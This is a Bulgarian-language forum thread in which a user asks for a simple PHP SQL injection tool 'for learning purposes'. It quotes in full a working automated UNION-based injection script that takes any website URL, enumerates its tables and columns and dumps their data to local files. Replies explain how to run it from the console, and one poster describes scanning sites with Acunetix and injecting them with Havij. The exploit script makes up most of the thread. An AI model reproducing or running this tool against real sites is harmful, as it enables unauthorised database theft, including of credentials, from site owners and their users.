dakata__92
Super Moderator
Някой има ли опростен инструмент подобен на Havij за въвеждане на SQL инжекция? Смисъл да е драснат на PHP ? С учебни цели ще го ползвам няма нужда от спеколации 
SQL инжектор
- Автор dakata__92
- Начална дата
Дори да има, едва ли ще ти дадът добър инжектор безплатно. Колкото до тези инжектори, мисля че са безполезни. Една добра сял инжекция се пише на ръка, тей като програмата не може да предвиди всичко а и е сложен там един синтаксис по който да работи. Ако може да разкриеш за какво ти е, може да те посъветваме за алтернативи
dakata__92
Super Moderator
Както вече казах ми е нужен за учебни цели! Има уроци и разни файлове към тях! Ако ставаше дума за базикане на сайтове, податливи на такъв вид атаки нее бих питал за просто кодче и то в такъв форум. В нета има доста мощни софтуери, които са и много гъвкави, но като цяло ме интересува да вникна по-надълбоко в нещата. Мога по всяко време да сваля дадена програма и да ми изведе нещата но се губи тръпката от опознаването на детайлите. Изчел съм много уроци знам как да се защитя, но просто желая да видя и код който както каза ти има определен синтаксис и работи при определен тип сайтове. Намерих в нета това, но не ми върши работа защото нагледно не мога да го подкарам да работи:nqkafff каза:
PHP:
<?php
set_time_limit(0);
if(!is_dir("dumps")){mkdir("dumps");}
echo "[+]Enter website: ";
$site = fgets(STDIN);
$site = str_replace("\r\n","",$site);
$site = trim($site);
if(!$site) exit("\n[-]Where is the website!");
if(!preg_match('#http#',$site)) $site = "http://".$site;
echo "[+]Enter column number: ";
$colons = fgets(STDIN);
$colons = str_replace("\r\n","",$colons);
$colons = trim($colons);
if(!$colons) exit("\n[-]Where is the columns!");
echo "[+]Enter effected column: ";
$effected = fgets(STDIN);
$effected = str_replace("\r\n","",$effected);
$effected = trim($effected);
if(!$effected) exit("\n[-]Where is the effected column!");
echo "[+]Advanced SQL Injecter\n";
echo "[+]Coded by Miyachung || Janissaries.Org\n";
$version_url = __make_SQL_URL($site,$colons,$effected,FALSE,TRUE,"",__hexEncode("<v3rsion>"),__hexEncode("</v3rsion>"),"version()");
$version_page = fetch($version_url);
if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$version_page))
{
exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
}
else if(preg_match("#403 Forbidden#si",$version_page))
{
exit("[-]Fail -> 403 Forbidden\n");
}
$version_page = __replace($version_page);
if(preg_match('#<v3rsion>#si',$version_page))
{
preg_match("/<v3rsion>(.*?)<\/v3rsion>/si",$version_page,$version);
echo "[+]Version -> ".strip_tags($version[1])."\n";
}
else
{
exit("[-]Version not found\n");
}
$database_url = __make_SQL_URL($site,$colons,$effected,FALSE,TRUE,"",__hexEncode("<d4tabase>"),__hexEncode("</d4tabase>"),"database()");
$database_page = fetch($database_url);
if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$database_page))
{
exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
}
else if(preg_match("#403 Forbidden#si",$database_page))
{
exit("[-]Fail -> 403 Forbidden\n");
}
$database_page = __replace($database_page);
if(preg_match('#<d4tabase>#si',$database_page))
{
preg_match("/<d4tabase>(.*?)<\/d4tabase>/si",$database_page,$database);
echo "[+]Database -> ".strip_tags($database[1])."\n";
}
else
{
echo "[-]Database not found\n";
}
if(substr($version[1],0,1) == 5)
{
echo "[+]Version >= 5 getting tables,using information_schema.tables\n";
}
else
{
exit("[-]Version < 5 , sorry can't get the tables");
}
$table_counturl = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.tables+where+table_schema=database()",TRUE,"",__hexEncode("<t4blecount>"),__hexEncode("</t4blecount>"),"count(table_name)");
$table_countpage = fetch($table_counturl);
$table_countpage = __replace($table_countpage);
preg_match("/<t4blecount>(.*?)<\/t4blecount>/si",$table_countpage,$table_counted);
if($table_counted[1] == null)
{
exit("[-]Tables not found\n");
}
echo "[+]Total tables -> ".$table_counted[1]."\n";
for($xz=0;$xz<$table_counted[1];$xz++)
{
$table_url[] = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.tables+where+table_schema=database()",TRUE,$xz,__hexEncode("<t4bles>"),__hexEncode("</t4bles>"),"table_name");
// $table_page = fetch($table_url);
// if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$table_page))
// {
// exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
// }
// elseif(preg_match("#403 Forbidden#si",$table_page))
// {
// exit("[-]Fail -> 403 Forbidden\n");
// }
// $table_page = __replace($table_page);
// preg_match("/<t4bles>(.*?)<\/t4bles>/si",$table_page,$tables);
// $tbls[] = strip_tags(trim($tables[1]));
}
$tbls = __threading($table_url,10,"/<t4bles>(.*?)<\/t4bles>/si",FALSE,FALSE);
table_again:
echo "\n";
$tbls = array_values(array_unique(array_filter($tbls)));
if(empty($tbls))
{
exit("[-]Can't get tables\n");
}
foreach($tbls as $tid => $tbl)
{
echo "[$tid]$tbl\n";
}
echo "\n[+]Choose a table for get columns,just type number (exit): ";
$choose = fgets(STDIN);
$choose = str_replace("\r\n","",$choose);
$choose = trim($choose);
if($choose == "exit")
{
exit("\n");
}
$selected = $tbls[$choose];
$column_counturl = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.columns+where+table_name=0x".__hexEncode($selected)."",TRUE,"",__hexEncode("<c0lumnscount>"),__hexEncode("</c0lumnscount>"),"count(column_name)");
$column_countpage = fetch($column_counturl);
$column_countpage = __replace($column_countpage);
preg_match("/<c0lumnscount>(.*?)<\/c0lumnscount>/si",$column_countpage,$column_counted);
if($column_counted[1] == null || $column_counted[1] == 0)
{
echo "[-]Columns not found\n";
goto table_again;
}
echo "[+]Total columns for $selected -> ".$column_counted[1]."\n";
for($xc=0;$xc<$column_counted[1];$xc++)
{
$column_url[] = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.columns+where+table_name=0x".__hexEncode($selected)."",TRUE,$xc,__hexEncode("<c0lumns>"),__hexEncode("</c0lumns>"),"column_name");
// $column_page = fetch($column_url);
// if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$column_page))
// {
// exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
// }
// elseif(preg_match("#403 Forbidden#si",$column_page))
// {
// exit("[-]Fail -> 403 Forbidden\n");
// }
// $column_page = __replace($column_page);
// preg_match("/<c0lumns>(.*?)<\/c0lumns>/si",$column_page,$columns);
// $cols[] = strip_tags(trim($columns[1]));
}
$cols = __threading($column_url,5,"/<c0lumns>(.*?)<\/c0lumns>/si",FALSE,FALSE);
col_showagain:
echo "\n";
$cols = array_values(array_unique(array_filter($cols)));
foreach($cols as $cid => $colname)
{
echo "[$cid]$colname\n";
}
what_again:
echo "\n[+]What do you wanna do (dump,back,exit): ";
$whatdo = fgets(STDIN);
$whatdo = str_replace("\r\n","",$whatdo);
$whatdo = trim($whatdo);
if($whatdo == "dump")
{
col_ask:
echo "[+]Select dump column 1,just type number(back,exit): ";
$select_col1 = fgets(STDIN);
$select_col1 = str_replace("\r\n","",$select_col1);
$select_col1 = trim($select_col1);
if($select_col1 == "back")
{
goto col_showagain;
}
else if($select_col1 == "exit")
{
exit("\n");
}
echo "[+]Select dump column 2,type number(if you don't want just enter,back,exit): ";
$select_col2 = fgets(STDIN);
$select_col2 = str_replace("\r\n","",$select_col2);
$select_col2 = trim($select_col2);
if($select_col2 == "back")
{
goto col_ask;
}
else if($select_col2 == "exit")
{
exit("\n");
}
else if(!empty($select_col2))
{
$column2 = $cols[$select_col2];
}
$column1 = $cols[$select_col1];
$count_url = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,"",__hexEncode("<miyacount>"),__hexEncode("</miyacount>"),"count($column1)");
$count_page = fetch($count_url);
$count_page = __replace($count_page);
preg_match("/<miyacount>(.*?)<\/miyacount>/si",$count_page,$datacount);
if(trim($datacount[1]) == null || $datacount[1] == 0)
{
echo "[-]Columns empty\n";
goto col_showagain;
}
echo "[+]Total datas -> ".$datacount[1]."\n";
echo "[+]Using LIMIT NULL,1 for dump\n\n";
for($x=0;$x<=$datacount[1];$x++)
{
if($column2)
{
$dump_url[] = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,$x,__hexEncode("<dumped>"),__hexEncode("</dumped>"),"$column1,0x3a,$column2");
$filename = "dumps/".__parse($site).",$column1"."_"."$column2.txt";
}
else
{
$dump_url[] = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,$x,__hexEncode("<dumped>"),__hexEncode("</dumped>"),"$column1");
$filename = "dumps/".__parse($site).",$column1.txt";
}
// $dump_page = fetch($dump_url);
// if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$dump_page))
// {
// exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
// }
// elseif(preg_match("#403 Forbidden#si",$dump_page))
// {
// exit("[-]Fail -> 403 Forbidden\n");
// }
// $dump_page = __replace($dump_page);
// if(preg_match("/<dumped>(.*?)<\/dumped>/si",$dump_page,$dumps))
// {
// $dump = $dumps[1];
// echo strip_tags(trim("[$x]$dump"))."\n";
// ob_flush();flush();
// __dumpsave($filename,$dump."\r\n");
// }
}
if($datacount[1] >= 20)
{
$dumps = __threading($dump_url,10,"/<dumped>(.*?)<\/dumped>/si",TRUE,TRUE,$filename);
}
else
{
$dumps = __threading($dump_url,10,"/<dumped>(.*?)<\/dumped>/si",TRUE,FALSE,"");
}
unset($column_url);
unset($dump_url);
goto col_showagain;
}
else if($whatdo == "back")
{
unset($column_url);
unset($cols);
goto table_again;
}
else if($whatdo == "exit")
{
exit("\n");
}
else
{
echo "[-]Unknown command\n";
goto what_again;
}
function fetch($url)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl,CURLOPT_TIMEOUT,10);
$oba = curl_exec($curl);
return $oba;
}
function __make_SQL_URL($site,$colons,$effected,$from,$concat,$limit,$hex1,$hex2,$what)
{
$colon_union = range(1,$colons);
if($concat)
{
$colon_union[$effected-1] = "concat(0x$hex1,$what,0x$hex2)";
}
else
{
$colon_union[$effected-1] = "group_concat(0x$hex1,$what,0x$hex2)";
}
$colon_union = implode(",",$colon_union);
if($from)
{
if($limit != null)
{
$url = $site."+and+1=0+union+select+".$colon_union.$from."+limit+$limit,1--";
}
else
{
$url = $site."+and+1=0+union+select+".$colon_union.$from."--";
}
}
else
{
if($limit != null)
{
$url = $site."+and+1=0+union+select+".$colon_union."+limit+$limit,1--";
}
$url = $site."+and+1=0+union+select+".$colon_union."--";
}
return $url;
}
function __threading($urls,$thread,$regex,$yaz,$kaydet,$file=NULL)
{
$init = curl_multi_init();
$urls = array_chunk($urls,$thread);
$x = 0;
foreach($urls as $url)
{
for($i=0;$i<=count($url)-1;$i++)
{
$curl[$i] = curl_init();
curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl[$i],CURLOPT_URL,$url[$i]);
curl_setopt($curl[$i],CURLOPT_TIMEOUT,10);
curl_multi_add_handle($init,$curl[$i]);
}
do{curl_multi_exec($init,$active);usleep(11);}while($active>0);
foreach($curl as $cid => $page)
{
$content[$cid] = curl_multi_getcontent($page);
curl_multi_remove_handle($init,$page);
if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$content[$cid]))
{
exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
}
else if(preg_match("#403 Forbidden#si",$content[$cid]))
{
exit("[-]Fail -> 403 Forbidden\n");
}
preg_match($regex,$content[$cid],$veri);
if($yaz == TRUE)
{
if(!empty($veri[1]) && preg_match("/[a-zA-Z0-9]:[a-zA-Z0-9]/si",$veri[1]))
{
$x++;
echo "[$x]$veri[1]\n";
ob_flush();flush();
if($kaydet == TRUE && $file != NULL)
{
$fopen = fopen($file,'ab');
fwrite($fopen,trim($veri[1])."\r\n");
fclose($fopen);
}
}
}
else
{
$veriler[] = $veri[1];
}
}
}
return $veriler;
}
function __hexEncode($string)
{
$hex='';
for ($i=0; $i < strlen($string); $i++)
{
$hex .= dechex(ord($string[$i]));
}
return $hex;
}
function __replace($text)
{
$text = str_replace("<","<",$text);
$text = str_replace(">",">",$text);
return $text;
}
function __dumpsave($file,$text)
{
$fp = fopen($file,'ab');
fwrite($fp,$text);
fclose($fp);
return true;
}
function __parse($site)
{
$site = explode("/",$site);
$site = $site[2];
return $site;
}
?>dakata__92
Super Moderator
Явноо никой не се наема да сподели някакво по-опростено кодче
dakata__92
Super Moderator
Аз виждам и разбирам горе долу какво прави, но НЕ можах да го подкарам! Качих го на хостинг с домейн и си извежда само ([-]Where is the website!)eLite каза:
Предпочитам някой код който наистина мога да тествам на сайт с нарочно допусната грешка от мен и да видя как наистина и на практика една такава грешка може да ми коства базата. Ако ставаше дума за някакви атаки към сайтове вече споменах ще си дръпна софтуер и няма да питам такива глупави въпроси! Колегата каза сам, че една инжекция НАЙ-добре се получава строго специфично за даден сайт 
dakata__92
Super Moderator
Коя конзола ? На този комп нямам локалхост.djman каза:dakata, извинявай, но защо си тръгнал да разучаваш кодове и начини, като не си разучил този, който си дал
Е, той човека конзола не му е ясно какво е, а е тръгнал с такива неща да се занимава.
CMD или Command Prompt е така наречената конзола под Windows.
Под Линукс и мисля че под Мак, се нарича Терминал.
Когато си под Windows задължително посочваш целия път до php.exe с функция -f и пътя на файла
Пример:
докато под линукс, стига да имаш инсталирано PHP, пишеш
(БЕЗ ЗНАКА ЗА ПО–ГОЛЯМО РАЗБИРА СЕ)
CMD или Command Prompt е така наречената конзола под Windows.
Под Линукс и мисля че под Мак, се нарича Терминал.
Когато си под Windows задължително посочваш целия път до php.exe с функция -f и пътя на файла
Пример:
PHP:
> D:\php\php.exe -f D:\apache\htdocs\file.phpдокато под линукс, стига да имаш инсталирано PHP, пишеш
PHP:
> php пътя-до-файла(БЕЗ ЗНАКА ЗА ПО–ГОЛЯМО РАЗБИРА СЕ)
Начините са 2 ръчно и с програми, аз ползвам програмата Acunetix (платена) за сканиране за дупки, след това ползвам havij за инжектиране.
Колкото за ръчното инжектиране може да погледнеш тук http://nukerbg.blogspot.com/2012/01/mysqli.html обяснено е подробно.
За повече информация може да ме намериш на скайп: dolph_777
Колкото за ръчното инжектиране може да погледнеш тук http://nukerbg.blogspot.com/2012/01/mysqli.html обяснено е подробно.
За повече информация може да ме намериш на скайп: dolph_777